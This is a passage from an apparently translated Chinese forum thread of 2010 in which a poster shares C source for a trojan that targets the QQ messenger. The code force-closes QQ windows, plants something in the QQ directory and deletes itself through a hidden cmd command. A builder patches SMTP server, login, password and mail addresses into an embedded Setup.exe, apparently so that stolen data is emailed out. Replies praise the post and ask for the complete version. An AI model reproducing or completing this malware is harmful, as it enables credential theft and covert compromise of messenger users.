             
            return true;
        }
    }
    return false;
}
 
void CloseAllQQProcess()
{
    while (true)
    {
        HWND hwnd=FindWindow("TXGuiFoundation",NULL);
        SendMessage(hwnd,WM_CLOSE,0,0);
        PostMessage(hwnd,WM_CLOSE,0,0);
        SendMessage(hwnd,WM_DESTROY,0,0);
        PostMessage(hwnd,WM_DESTROY,0,0);
        SendMessage(hwnd,WM_CHAR,VK_RETURN,0);
        PostMessage(hwnd,WM_CHAR,VK_RETURN,0);
        Sleep(10);
        if(hwnd==NULL)
            break;
    }
}
 
void SelfDelete(void)
{
    char lpBuffer[MAX_PATH], lpFilename[MAX_PATH], lpCmdLine[MAX_PATH];
    GetEnvironmentVariable("ComSpec", lpBuffer, MAX_PATH);
    GetModuleFileName(NULL, lpFilename, MAX_PATH);
    sprintf(lpCmdLine, "%s /c del \"%s\"", lpBuffer, lpFilename);
    WinExec(lpCmdLine, SW_HIDE);
}
 
 
int WINAPI WinMain( __in HINSTANCE hInstance, __in_opt HINSTANCE hPrevInstance, __in_opt LPSTR lpCmdLine, __in int nShowCmd )
{
    CloseAllQQProcess();
    InsertQQDirectory();
    SelfDelete();
    return 0;
}
2010-11-1 20:47
0
18
Main function code in the configurator

void CConfigureSetupDlg::WriteData()
{
    HRSRC hRsrc=::FindResource(NULL,MAKEINTRESOURCE(IDR_EXE1),"EXE");
    HGLOBAL hGlobal=::LoadResource(NULL,hRsrc);
    LPVOID lpVoid=::LockResource(hGlobal);
    DWORD dwSize=::SizeofResource(NULL,hRsrc);
 
    char szDllPath[1000];
    GetCurrentDirectory(1000,szDllPath);
    strcat(szDllPath,"\\Setup.exe");
 
    HANDLE hFile=::CreateFile(szDllPath,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,
        NULL,CREATE_NEW,0,NULL);
    DWORD dwWriteByte;
    if(hFile!=NULL)
        ::WriteFile(hFile,lpVoid,dwSize,&dwWriteByte,NULL);
 
    LONG dwAddress=0;
    DWORD dwWrite;
 
    UpdateData(TRUE);
 
    char sz0[20]={0};
 
    dwAddress=0x3018;
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,sz0,20,&dwWrite,NULL);
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,m_SmtpServer,m_SmtpServer.GetLength(),&dwWrite,NULL);
 
    dwAddress=0x3080;
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,sz0,20,&dwWrite,NULL);
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,m_UserName,m_UserName.GetLength(),&dwWrite,NULL);
 
    dwAddress=0x30E8;
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,sz0,20,&dwWrite,NULL);
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,m_Password,m_Password.GetLength(),&dwWrite,NULL);
 
    dwAddress=0x3150;
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,sz0,20,&dwWrite,NULL);
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,m_SendMailAddress,m_SendMailAddress.GetLength(),&dwWrite,NULL);
 
    dwAddress=0x31B8;
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,sz0,20,&dwWrite,NULL);
    SetFilePointer(hFile,dwAddress,NULL,FILE_BEGIN);
    WriteFile(hFile,m_RecvMailAddress,m_RecvMailAddress.GetLength(),&dwWrite,NULL);
 
    CloseHandle(hFile);
}
2010-11-1 20:48
0
19
Joining the fun too, to see how a trojan is made.
2010-11-1 20:49
0
20
Support OP's open-source spirit!!!
2010-11-1 20:50
0
21
Support OP's open-source spirit!!!
2010-11-1 20:59
0
22
If QQ isn't installed under the Program Files directory, does it just not work?
2010-11-1 22:41
0
23
Absolutely bump, ahhh
2010-11-1 23:01
0
24
OP, please post a complete one.
2010-11-1 23:06
0
25
Bump, support OP posting a complete one, thanks.
2010-11-1 23:24
0